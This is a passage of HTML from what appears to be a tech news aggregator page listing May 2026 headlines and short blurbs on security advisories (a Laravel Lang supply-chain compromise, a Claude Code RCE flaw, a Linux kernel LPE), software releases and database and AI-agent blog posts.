              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Hundreds of historical Laravel Lang Packagist releases were republished with malicious code, putting Composer installs at risk of credential theft and secret exfiltration.</p>
<p><strong>📅 May 23, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/laravel-lang-supply-chain-advisory/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-attackers-can-exploit-a-claude-code-rce-flaw-to-take-command-of-system" class="group relative scroll-mt-24">
        <a href="#h3-attackers-can-exploit-a-claude-code-rce-flaw-to-take-command-of-system" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Attackers Can Exploit a Claude Code RCE Flaw to Take Command of System
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-attackers-can-exploit-a-claude-code-rce-flaw-to-take-command-of-system"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A dangerous vulnerability found in Anthropic’s popular Claude Code developer model could have allowed bad actors to grab control of a victim’s system by luring them into clicking on a crafted maliciou</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/attackers-can-exploit-a-claude-code-rce-flaw-to-take-command-of-system/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-aws-security-agent-adds-verification-scripts-for-pentest-findings" class="group relative scroll-mt-24">
        <a href="#h3-aws-security-agent-adds-verification-scripts-for-pentest-findings" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 AWS Security Agent adds verification scripts for pentest findings
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-aws-security-agent-adds-verification-scripts-for-pentest-findings"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AWS Security Agent now generates verification scripts for penetration test findings, enabling security teams to independently reproduce and validate discovered vulnerabilities. Previously, teams manua</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/aws-security-agent/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-modernizing-devops-security-with-intelligent-kyc-enforcement-layers" class="group relative scroll-mt-24">
        <a href="#h3-modernizing-devops-security-with-intelligent-kyc-enforcement-layers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Modernizing DevOps Security With Intelligent KYC Enforcement Layers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-modernizing-devops-security-with-intelligent-kyc-enforcement-layers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This is where smart KYC enforcement layers fit in — not a compliance box, but an engineering control that is directly part of DevOps processes.</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/modernizing-devops-security-with-intelligent-kyc-enforcement-layers/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-teamcity-2025115-is-out" class="group relative scroll-mt-24">
        <a href="#h3-teamcity-2025115-is-out" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 TeamCity 2025.11.5 Is Out
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-teamcity-2025115-is-out"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Our (most likely) final update for TeamCity 2025.11 On-Premises servers has just been released. This updage addresses a tiny amount of issues, but includes four security problem fixes, so we recommend</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/teamcity/2026/05/teamcity-2025-11-5-bug-fix/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-snyk-announces-anthropic-updates-evo-integrates-with-claude-enterprise-and-snyk-desk-comes-to-claude-desktop" class="group relative scroll-mt-24">
        <a href="#h3-snyk-announces-anthropic-updates-evo-integrates-with-claude-enterprise-and-snyk-desk-comes-to-claude-desktop" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Snyk announces Anthropic updates: Evo integrates with Claude Enterprise, and Snyk Desk comes to Claude Desktop
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-snyk-announces-anthropic-updates-evo-integrates-with-claude-enterprise-and-snyk-desk-comes-to-claude-desktop"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Snyk announces two new integrations with Anthropic that cover both sides of AI-assisted development. Evo by Snyk now integrates with Anthropic&#39;s Claude Enterprise, and the Snyk Security Desktop Extens</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/claude-enterprise-integration-desktop-expansion/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-announcing-claude-compliance-api-support-with-cloudflare-casb" class="group relative scroll-mt-24">
        <a href="#h3-announcing-claude-compliance-api-support-with-cloudflare-casb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Announcing Claude Compliance API support with Cloudflare CASB
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-announcing-claude-compliance-api-support-with-cloudflare-casb"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Cloudflare now integrates with the Claude Compliance API, so that security teams can monitor Claude Enterprise activity directly in the Cloudflare Dashboard.</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/casb-anthropic-integration/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pintheft-linux-kernel-vulnerability-mitigation" class="group relative scroll-mt-24">
        <a href="#h3-pintheft-linux-kernel-vulnerability-mitigation" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PinTheft Linux kernel vulnerability mitigation
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pintheft-linux-kernel-vulnerability-mitigation"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A local privilege escalation (LPE) security vulnerability in the Linux kernel, codename “PinTheft,” was publicly disclosed on May 19, 2026. The vulnerability was fixed in the mainline Linux kernel tre</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Ubuntu Blog</strong></p>
<p><a href="https://ubuntu.com//blog/pintheft-linux-kernel-vulnerability-mitigation"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-the-ai-revolution-how-snyk-and-our-partners-are-scaling-for-the-future" class="group relative scroll-mt-24">
        <a href="#h3-securing-the-ai-revolution-how-snyk-and-our-partners-are-scaling-for-the-future" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing The AI Revolution: How Snyk And Our Partners Are Scaling For The Future
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-securing-the-ai-revolution-how-snyk-and-our-partners-are-scaling-for-the-future"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI is accelerating code creation. Learn how Snyk is scaling its AI Security Platform and investing in new partner programs to help enterprises govern AI-generated code at scale.</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Snyk Blog</strong></p>
<p><a href="https://snyk.io/blog/securing-ai-revolution-snyk-partners/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitea-1262-is-released" class="group relative scroll-mt-24">
        <a href="#h3-gitea-1262-is-released" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Gitea 1.26.2 is released
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitea-1262-is-released"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>We are excited to announce the release of Gitea 1.26.2! We strongly recommend all users upgrade to this version, as it contains a number of security fixes alongside important bug fixes and stability i</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Gitea Blog</strong></p>
<p><a href="https://blog.gitea.com/release-of-1.26.2"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-databases" class="group relative scroll-mt-24">
        <a href="#h2-databases" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          💾 Databases
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-databases"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-pg_tre-111-released-an-approximate-regex-index-am-for-postgresql-18" class="group relative scroll-mt-24">
        <a href="#h3-pg_tre-111-released-an-approximate-regex-index-am-for-postgresql-18" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_tre 1.1.1 released -- an approximate-REGEX index AM for PostgreSQL 18+
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pg_tre-111-released-an-approximate-regex-index-am-for-postgresql-18"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>I am pleased to announce the first public release of [pg_tre] (<a href="https://codeberg.org/gregburd/pg_tre">https://codeberg.org/gregburd/pg_tre</a>), a native PostgreSQL 18+ index access method for approximate-regex matching. pg_tre indexes text co</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_tre-111-released-an-approximate-regex-index-am-for-postgresql-18-3305/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pg_infer-100-released-transformer-model-knowledge-as-sql-relations" class="group relative scroll-mt-24">
        <a href="#h3-pg_infer-100-released-transformer-model-knowledge-as-sql-relations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_infer 1.0.0 released -- transformer model knowledge as SQL relations
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pg_infer-100-released-transformer-model-knowledge-as-sql-relations"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>I am pleased to announce the first public release of pg_infer, a PostgreSQL 18+ extension that exposes the internals of small transformer language models -- gate activations, feature labels, learned a</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_infer-100-released-transformer-model-knowledge-as-sql-relations-3307/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pg_mentat-130-released-datomic-compatible-datalog-inside-postgresql" class="group relative scroll-mt-24">
        <a href="#h3-pg_mentat-130-released-datomic-compatible-datalog-inside-postgresql" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 pg_mentat 1.3.0 released -- Datomic-compatible Datalog inside PostgreSQL
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pg_mentat-130-released-datomic-compatible-datalog-inside-postgresql"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>I am pleased to announce the first public release of [pg_mentat] (<a href="https://github.com/gburd/pg_mentat">https://github.com/gburd/pg_mentat</a>), a PostgreSQL extension that implements Datomic&#39;s data model -- immutable facts (datoms), schema-f</p>
<p><strong>📅 May 22, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pg_mentat-130-released-datomic-compatible-datalog-inside-postgresql-3306/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nosql-storm-stop-fighting-the-mongodb" class="group relative scroll-mt-24">
        <a href="#h3-the-nosql-storm-stop-fighting-the-mongodb" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The NoSQL Storm - Stop fighting the MongoDB
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-nosql-storm-stop-fighting-the-mongodb"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The NoSQL Storm, a Database DevOps comic inspired by MongoDB, exploring NoSQL scaling, schema evolution, and modern DevOps practices. | Blog</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/database-devops-comic-volume-2"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-pgday-israel-2026-call-for-papers-is-now-open" class="group relative scroll-mt-24">
        <a href="#h3-pgday-israel-2026-call-for-papers-is-now-open" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 PGDay Israel 2026 - Call for Papers is Now Open
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-pgday-israel-2026-call-for-papers-is-now-open"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Dear PostgreSQL Community, We are pleased to announce that the Call for Papers for PGDay Israel 2026 is now open. We invite community members, users, and developers to submit proposals for talks and p</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 PostgreSQL News</strong></p>
<p><a href="https://www.postgresql.org/about/news/pgday-israel-2026-call-for-papers-is-now-open-3291/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-long-horizon-tasks-building-agents-that-work-over-hours-days" class="group relative scroll-mt-24">
        <a href="#h3-long-horizon-tasks-building-agents-that-work-over-hours-days" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Long-horizon tasks: building agents that work over hours & days
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-long-horizon-tasks-building-agents-that-work-over-hours-days"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Early AI agents handled one-shot jobs that took a few minutes: fix this bug, write this function, generate this test. More recent workflows are multi-step, tool-using, and stateful over extended sessi</p>
<p><strong>📅 May 21, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/long-horizon-ai-agents-memory-state-infrastructure/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-benchmarking-ai-coding-agents-for-distributed-sql-what-we-learned" class="group relative scroll-mt-24">
        <a href="#h3-benchmarking-ai-coding-agents-for-distributed-sql-what-we-learned" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Benchmarking AI Coding Agents for Distributed SQL: What We Learned
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-benchmarking-ai-coding-agents-for-distributed-sql-what-we-learned"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AI models write vanilla PostgreSQL. If your database is distributed, providing the AI model with a YugabyteDB skill file closes the gap and ensures it writes code that works for your application. In t</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Yugabyte Blog</strong></p>
<p><a href="https://www.yugabyte.com/blog/benchmarking-ai-coding-agents-for-distributed-sql-lessons/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-a-context-engine-the-platform-layer-behind-production-ai-agents" class="group relative scroll-mt-24">
        <a href="#h3-what-is-a-context-engine-the-platform-layer-behind-production-ai-agents" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What is a context engine? The platform layer behind production AI agents
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-what-is-a-context-engine-the-platform-layer-behind-production-ai-agents"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Count the systems behind your AI agent. A vector database for embeddings. A separate cache for LLM responses. A memory service for conversation state. A pipeline syncing data from Postgres. Probably a</p>
<p><strong>📅 May 20, 2026</strong> • <strong>📰 Redis Blog</strong></p>
<p><a href="https://redis.io/blog/what-is-a-context-engine/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-tidb-scaile-europe-2026-why-engineers-building-agentic-ai-should-be-in-stockholm-on-4-june" class="group relative scroll-mt-24">
        <a href="#h3-tidb-scaile-europe-2026-why-engineers-building-agentic-ai-should-be-in-stockholm-on-4-june" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 TiDB SCaiLE Europe 2026: Why Engineers Building Agentic AI Should Be in Stockholm on 4 June
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-tidb-scaile-europe-2026-why-engineers-building-agentic-ai-should-be-in-stockholm-on-4-june"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Most teams shipping AI agents in 2026 hit the same wall around the same time. The prototype works. Ten users or even a thousand users mostly work. But then one user action triggers thousands of agent </p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 TiDB Blog</strong></p>
<p><a href="https://www.pingcap.com/blog/tidb-scaile-europe-2026-why-attend/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-apache-cassandra-performance-tuning-what-we-learned" class="group relative scroll-mt-24">
        <a href="#h3-apache-cassandra-performance-tuning-what-we-learned" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Apache Cassandra Performance Tuning: What We Learned
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-apache-cassandra-performance-tuning-what-we-learned"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>This blog post (tries to) consolidate what we&#39;ve learned from years of tuning Apache Cassandra for performance</p>
<p><strong>📅 May 19, 2026</strong> • <strong>📰 ScyllaDB Blog</strong></p>
<p><a href="https://www.scylladb.com/2026/05/19/cassandra-performance-tuning-lessons-learned/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-what-is-a-context-layer-ai-agent-infrastructure" class="group relative scroll-mt-24">
        <a href="#h3-what-is-a-context-layer-ai-agent-infrastructure" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
